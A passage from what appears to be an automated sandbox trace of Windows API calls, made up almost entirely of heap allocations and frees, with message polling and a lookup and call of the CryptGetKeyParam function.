hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0078.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.767] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0078.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0078.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.768] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0078.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0078.768] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0078.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0078.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0078.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0078.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0078.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0078.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0078.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0078.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0078.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0078.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0078.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0078.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0078.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.772] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0078.772] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e28e0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28e0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0078.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0078.774] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0078.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.775] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.775] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0078.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: 